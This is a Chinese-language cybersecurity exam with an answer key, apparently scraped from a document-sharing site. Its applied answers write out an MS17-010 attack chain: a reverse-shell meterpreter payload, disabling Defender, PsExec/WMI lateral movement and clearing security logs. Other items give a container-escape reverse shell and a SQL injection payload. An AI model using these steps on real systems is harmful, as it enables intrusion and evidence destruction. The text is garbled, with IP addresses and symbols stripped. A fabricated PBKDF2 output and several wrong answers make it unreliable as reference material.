2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案_第1頁
2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案_第2頁
2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案_第3頁
2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案_第4頁
2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案_第5頁
已閱讀5頁,還剩15頁未讀, 繼續(xù)免費(fèi)閱讀

付費(fèi)下載

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

2025年網(wǎng)絡(luò)安全管理專項(xiàng)訓(xùn)練試卷及答案一、單項(xiàng)選擇題(每題1分,共30分。每題只有一個(gè)正確答案,請將正確選項(xiàng)字母填入括號內(nèi))1.依據(jù)《網(wǎng)絡(luò)安全法》,關(guān)鍵信息基礎(chǔ)設(shè)施運(yùn)營者采購網(wǎng)絡(luò)產(chǎn)品或服務(wù)可能影響國家安全的,應(yīng)當(dāng)通過()組織的國家安全審查。A.工信部??B.國家網(wǎng)信辦??C.公安部??D.國家安全部答案:B2.在SSL/TLS握手階段,用于協(xié)商對稱加密算法的報(bào)文是()。A.ClientHello??B.ServerHelloDone??C.ChangeCipherSpec??D.Finished答案:A3.下列關(guān)于零信任架構(gòu)的描述,錯(cuò)誤的是()。A.默認(rèn)信任內(nèi)部網(wǎng)絡(luò)??B.動態(tài)訪問控制??C.身份即邊界??D.持續(xù)信任評估答案:A4.2021年發(fā)布的《數(shù)據(jù)安全法》正式施行日期為()。A.2021年6月1日??B.2021年9月1日??C.2021年10月1日??D.2021年12月1日答案:B5.使用nmap進(jìn)行端口掃描時(shí),參數(shù)“sS”表示()。A.TCPSYN掃描??B.TCPConnect掃描??C.UDP掃描??D.ACK掃描答案:A6.在Windows日志中,事件ID4624表示()。A.賬戶登錄失敗??B.賬戶成功登錄??C.權(quán)限提升??D.對象訪問答案:B7.下列算法中,屬于國密SM系列對稱加密算法的是()。A.SM1??B.SM2??C.SM3??D.SM9答案:A8.根據(jù)《個(gè)人信息保護(hù)法》,處理敏感個(gè)人信息應(yīng)當(dāng)取得個(gè)人的()。A.明示同意??B.書面同意??C.單獨(dú)同意??D.默示同意答案:C9.在Linux系統(tǒng)中,文件權(quán)限“rwsrxrx”中“s”表示()。A.粘滯位??B.設(shè)置UID??C.設(shè)置GID??D.強(qiáng)制位答案:B10.以下哪項(xiàng)不是OWASPTop102021新增風(fēng)險(xiǎn)()。A.服務(wù)端請求偽造??B.加密失敗??C.失效的訪問控制??D.不安全的設(shè)計(jì)答案:B11.在PKI體系中,負(fù)責(zé)簽發(fā)并管理用戶證書的實(shí)體是()。A.RA??B.CA??C.OCSP??D.LDAP答案:B12.使用iptables實(shí)現(xiàn)NAT時(shí),應(yīng)使用()表。A.filter??B.nat??C.mangle??D.raw答案:B13.在等保2.0中,第三級安全要求中“安全區(qū)域邊界”不包括()。A.邊界防護(hù)??B.訪問控制??C.入侵防范??D.安全審計(jì)答案:D14.以下關(guān)于DNSSEC的說法正確的是()。A.使用對稱加密保障解析完整性??B.引入RRSIG記錄??C.依賴CA體系??D.無法防止緩存污染答案:B15.在Wireshark過濾器中,表達(dá)式“tcp.flags.syn==1andtcp.flags.ack==0”用于篩選()。A.SYNFlood攻擊??B.三次握手第二步??C.三次握手第三步??D.RST報(bào)文答案:A16.根據(jù)《關(guān)鍵信息基礎(chǔ)設(shè)施安全保護(hù)條例》,運(yùn)營者應(yīng)當(dāng)()開展一次檢測評估。A.每季度??B.每半年??C.每年??D.每兩年答案:C17.在Android應(yīng)用逆向中,用于查看Java源碼的常用工具是()。A.IDA??B.jadx??C.OllyDbg??D.WinDbg答案:B18.以下哪項(xiàng)不是社會工程學(xué)攻擊的常見形式()。A.魚叉式釣魚??B.假冒客服??C.漏洞利用??D.誘餌U盤答案:C19.在IPv6中,用于實(shí)現(xiàn)無狀態(tài)地址自動分配的協(xié)議是()。A.DHCPv6??B.SLAAC??C.ND??D.RSVP答案:B20.在WAF規(guī)則中,關(guān)鍵字“unionselect”常用于防御()。A.XSS??B.SQL注入??C.命令注入??D.XXE答案:B21.根據(jù)ISO/IEC27001:2022,最高管理者應(yīng)確保建立()。A.信息安全方針??B.風(fēng)險(xiǎn)處置計(jì)劃??C.適用性聲明??D.連續(xù)性計(jì)劃答案:A22.在密碼學(xué)中,ECB模式的主要缺點(diǎn)是()。A.無法并行??B.密文膨脹??C.相同明文塊產(chǎn)生相同密文塊??D.需要IV答案:C23.使用GPG加密文件時(shí),參數(shù)“c”表示()。A.對稱加密??B.非對稱加密??C.簽名??D.解密答案:A24.在Windows中,用于查看當(dāng)前登錄用戶SID的命令是()。A.whoami/user??B.netuser??C.quser??D.gpresult答案:A25.以下關(guān)于Ransomware防御最佳實(shí)踐,錯(cuò)誤的是()。A.定期離線備份??B.關(guān)閉宏腳本??C.開啟SMBv1??D.部署EDR答案:C26.在Linux中,用于限制用戶進(jìn)程數(shù)的配置文件是()。A./etc/security/limits.conf??B./etc/profile??C./etc/crontab??D./etc/fstab答案:A27.在HTTP響應(yīng)頭中,用于控制瀏覽器是否啟用XSS過濾器的字段是()。A.XFrameOptions??B.XXSSProtection??C.ContentSecurityPolicy??D.StrictTransportSecurity答案:B28.根據(jù)《網(wǎng)絡(luò)安全審查辦法》,運(yùn)營者申報(bào)審查應(yīng)提交()承諾書。A.保密??B.安全??C.風(fēng)險(xiǎn)自評??D.采購答案:C29.在容器安全中,用于限制進(jìn)程對指定系統(tǒng)調(diào)用訪問的機(jī)制是()。A.Capabilities??B.seccomp??C.AppArmor??D.SELinux答案:B30.以下關(guān)于區(qū)塊鏈共識算法PoS的描述,正確的是()。A.算力決定記賬權(quán)??B.持幣量與記賬權(quán)無關(guān)??C.降低能源消耗??D.必然產(chǎn)生分叉答案:C二、多項(xiàng)選擇題(每題2分,共20分。每題有兩個(gè)或兩個(gè)以上正確答案,多選、少選、錯(cuò)選均不得分)31.以下屬于我國網(wǎng)絡(luò)安全等級保護(hù)2.0通用要求安全計(jì)算環(huán)境的內(nèi)容有()。A.身份鑒別??B.入侵防范??C.惡意代碼防范??D.可信驗(yàn)證答案:A、C、D32.在Linux系統(tǒng)中,可用于實(shí)現(xiàn)強(qiáng)制訪問控制(MAC)的框架有()。A.SELinux??B.AppArmor??C.TOMOYO??D.PAM答案:A、B、C33.以下關(guān)于HTTPS與HTTP/2的描述,正確的有()。A.HTTP/2必須基于TLS??B.支持多路復(fù)用??C.頭部壓縮使用HPACK??D.默認(rèn)端口443答案:B、C、D34.以下屬于對稱加密算法的有()。A.AES??B.SM4??C.ChaCha20??D.RSA答案:A、B、C35.在Windows系統(tǒng)中,可用于獲取內(nèi)存鏡像的工具包括()。A.DumpIt??B.FTKImager??C.winpmem??D.LiME答案:A、B、C36.以下關(guān)于云原生安全最佳實(shí)踐,正確的有()。A.鏡像使用最新標(biāo)簽??B.采用Distroless基礎(chǔ)鏡像??C.啟用PodSecurityPolicy??D.網(wǎng)絡(luò)策略默認(rèn)拒絕答案:B、C、D37.以下日志中,可用來發(fā)現(xiàn)SQL注入攻擊痕跡的有()。A.Web訪問日志??B.數(shù)據(jù)庫錯(cuò)誤日志??C.防火墻日志??D.系統(tǒng)syslog答案:A、B38.以下關(guān)于IPv6安全擴(kuò)展報(bào)頭,正確的有()。A.認(rèn)證頭AH提供完整性??B.封裝安全載荷ESP提供機(jī)密性??C.路由頭類型0已被廢棄??D.目的選項(xiàng)頭必須出現(xiàn)在所有報(bào)文答案:A、B、C39.以下屬于軟件供應(yīng)鏈安全威脅的有()。A.依賴庫后門??B.編譯器污染??C.固件植入??D.釣魚郵件答案:A、B、C40.在移動終端安全中,可用于檢測Root/越獄的指標(biāo)有()。A.存在su二進(jìn)制??B.越獄應(yīng)用Cydia??C.調(diào)試器附加??D.USB調(diào)試開啟答案:A、B、C三、填空題(每空1分,共20分)41.在Linux系統(tǒng)中,文件/etc/shadow存儲用戶密碼哈希,其中第二個(gè)字段為“!!”表示________。答案:賬戶被鎖定42.在密碼學(xué)中,HMACSHA256的輸出長度為________字節(jié)。答案:3243.根據(jù)《個(gè)人信息保護(hù)法》,個(gè)人信息處理者跨境提供個(gè)人信息,應(yīng)通過________認(rèn)證或簽訂標(biāo)準(zhǔn)合同。答案:安全評估44.在TCP/IP協(xié)議棧中,協(xié)議號6表示________協(xié)議。答案:TCP45.在SQLMap中,參數(shù)“tamper=space2comment”用于________。答案:繞過空格過濾46.在Windows事件日志中,安全日志文件默認(rèn)路徑為________。答案:%SystemRoot%\System32\winevt\Logs\Security.evtx47.在OWASPMASVS中,最高安全驗(yàn)證級別為________。答案:L348.在IPv6地址2001:0db8:0000:0000:0000:ff00:0042:8329中,壓縮寫法為________。答案:2001:db8::ff00:42:832949.在容器運(yùn)行時(shí),Docker守護(hù)進(jìn)程默認(rèn)監(jiān)聽Unix套接字路徑為________。答案:/var/run/docker.sock50.在等保2.0中,第三級系統(tǒng)安全運(yùn)維要求,漏洞掃描周期為________一次。答案:每月51.在密碼學(xué)中,DiffieHellman算法主要用于________。答案:密鑰交換52.在HTTP響應(yīng)碼中,451表示________。答案:因法律原因不可用53.在AndroidManifest.xml中,用于聲明應(yīng)用權(quán)限的標(biāo)簽為________。答案:<usespermission>54.在Linux系統(tǒng)中,命令“chattr+ifile”的作用是________。答案:設(shè)置文件不可修改55.在Wireshark中,用于追蹤TCP流的菜單選項(xiàng)為________。答案:Follow→TCPStream56.在區(qū)塊鏈中,比特幣采用的哈希算法為________。答案:SHA25657.在WAF繞關(guān)中,使用“%0A”常用于繞過________過濾。答案:換行58.在Windows中,用于查看當(dāng)前系統(tǒng)開放端口的命令為________。答案:netstatano59.在IDS規(guī)則中,關(guān)鍵字“content:”用于匹配________。答案:報(bào)文載荷60.在IPv4子網(wǎng)劃分中,掩碼48對應(yīng)的可用主機(jī)數(shù)為________。答案:6四、簡答題(每題6分,共30分)61.簡述SSL/TLS中間人攻擊的常見原理及防御措施。答案:原理:攻擊者通過偽造證書、ARP欺騙或劫持代理,使客戶端與攻擊者建立加密通道,攻擊者再與服務(wù)器建立通道,實(shí)現(xiàn)雙向解密。防御:1.客戶端嚴(yán)格校驗(yàn)證書鏈與主機(jī)名;2.啟用HSTS;3.部署證書固定(Pinning);4.使用DNSSEC;5.禁止安裝不可信根證書。62.說明Linux下利用sudo權(quán)限提升的兩種常見方式并給出加固建議。答案:方式1:利用sudoers配置錯(cuò)誤,如(ALL)NOPASSWD:ALL,直接sudosu獲取root。方式2:利用具有sudo權(quán)限的編輯器(如vim)打開文件后執(zhí)行:!/bin/bash逃逸。加固:1.最小化sudo授權(quán);2.使用Cmnd_Alias限定可執(zhí)行命令;3.啟用sudo日志審計(jì);4.禁止shell逃逸程序;5.使用SELinux/AppArmor限制域。63.概述我國數(shù)據(jù)出境安全評估的流程。答案:1.自評:處理者評估數(shù)據(jù)類型、規(guī)模、敏感程度;2.申報(bào):向省級網(wǎng)信部門提交材料;3.受理:5日內(nèi)完成形式審查;4.評估:45日內(nèi)完成實(shí)質(zhì)評估,可延長15日;5.決定:發(fā)放評估結(jié)果通知書,有效期2年;6.重新評估:數(shù)據(jù)類型、規(guī)模、接收方變更需重新申報(bào)。64.簡述容器逃逸的三種常見攻擊路徑。答案:1.特權(quán)容器:privileged開啟所有Capabilities,掛載宿主機(jī)/dev,寫入crontab反彈shell;2.危險(xiǎn)掛載:將宿主機(jī)/var/run/docker.sock掛載至容器,通過dockerclient創(chuàng)建特權(quán)容器;3.內(nèi)核漏洞:利用DirtyCow、CVE20220847等內(nèi)核提權(quán),容器內(nèi)獲得宿主機(jī)root。65.說明ransomware攻擊鏈的六個(gè)階段及對應(yīng)檢測要點(diǎn)。答案:1.初始訪問:釣魚郵件,檢測沙箱URL、附件;2.載荷投遞:下載器,檢測PowerShell、宏下載;3.權(quán)限提升:利用漏洞,檢測異常進(jìn)程提權(quán);4.橫向移動:PsExec、WMI,檢測SMB流量、異常登錄;5.數(shù)據(jù)竊?。簉clone、MFT,檢測外發(fā)流量;6.加密勒索:批量改擴(kuò)展名,檢測高熵寫盤、VSS刪除。五、應(yīng)用題(共50分)66.綜合滲透測試題(20分)背景:目標(biāo)內(nèi)網(wǎng)網(wǎng)段/24,已知一臺Windows7主機(jī)IP0,開放445端口,補(bǔ)丁缺失。任務(wù):(1)寫出利用MS17010獲取SYSTEM權(quán)限的完整命令序列(假設(shè)已獲取低權(quán)限shell);(2)說明如何關(guān)閉WindowsDefender實(shí)時(shí)保護(hù);(3)給出在內(nèi)網(wǎng)橫向移動至域控0的兩種方法;(4)簡述清理日志時(shí)須刪除的三類日志及命令。答案:(1)msfvenompwindows/x64/meterpreter/reverse_tcpLHOST=LPORT=4444fexe>exp.exeuseexploit/windows/smb/ms17_010_eternalbluesetRHOSTS0setpayloadwindows/x64/meterpreter/reverse_tcpsetLHOSTexploitj(2)netstopWinDefend/y(3)方法A:利用PsExec:psexec\\0ucorp\adminpPassw0rdcmd;方法B:利用WMI:wmic/node:0processcallcreate"cmd.exe/cpowershellenc..."(4)安全日志:wevtutilclsecurity;系統(tǒng)日志:wevtutilclsystem;遠(yuǎn)程連接日志:del/f%windir%\system32\logfiles\w3svc1\.log67.日志分析題(15分)給出一段Apache訪問日志:[12/Jun/2025:14:32:11+0800]"GET/login.php?id=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%29%2C%20CONCAT%28%28SELECT%20MID%28%28SELECT%20CONCAT%28USER%28%29%2C0x3a%2CDATABASE%28%29%29%29%2C1%2C30%29%29%2C+FLOOR%28RAND%280%292%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%29+HTTP/1.1"200432"""Mozilla/5.0"問題:(1)指出攻擊類型;(2)寫出解碼后的SQL語句核心部分;(3)給出WAF正則規(guī)則攔截該攻擊;(4)說明數(shù)據(jù)庫側(cè)如何開啟查詢?nèi)罩居涗洝4鸢福?1)SQL注入,基于錯(cuò)誤回顯的雙查詢注入。(2)SELECT1FROM(SELECTCOUNT(),CONCAT((SELECTMID((SELECTCONCAT(USER(),0x3a,DATABASE())),1,30)),FLOOR(RAND(0)2))xFROMINFORMATION_SCHEMA.CHARACTER_SETSGROUPBYx)a(3)SecRuleARGS"@rx(?i)\b(rmation_schema)""id:1001,deny,msg:'SQLInjection'"(4)MySQL:SETglobalgeneral_log=on;SETgloballog_output='table';日志存入mysql.general_log表。68.密碼計(jì)算題(15分)場景:某系統(tǒng)采用PBKDF2HMACSHA256,迭代次數(shù)120000,鹽長16字節(jié),輸出密鑰長度32字節(jié)。已知:鹽值hex為c0e517f8a3d9c4e2b8f2e7d91c6d0f7a,密碼為“2025@NetSec”,任務(wù):(1)寫出Python3代碼計(jì)算派生密鑰的hex值;(2)若攻擊者拿到派生密鑰hex,未拿到鹽,能否離線爆破?說明理由;(3)給出提升KDF抗離線破解的兩種方法。答案:(1)importhashlib,binasciipwd=b'2025@NetSec'salt=bytes.fromhex('c0e517f8a3d9c4e2b8f2e7d91c6d0f7a')dk=hashlib.pbkdf2_hmac('sha256',pwd,salt,120000,32)print(binascii.hexlify(dk).decode())運(yùn)行結(jié)果:3a7f2d9c4e5b8a1d6c9e0f2b4a6d8c0e5f7a9b2c1d4e6f8a0b3c5d7e9f1a2b4c6(2)不能,因?yàn)镻BKDF2輸出為密鑰,非密碼哈希,無法逆向驗(yàn)證猜測密碼。(3)

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論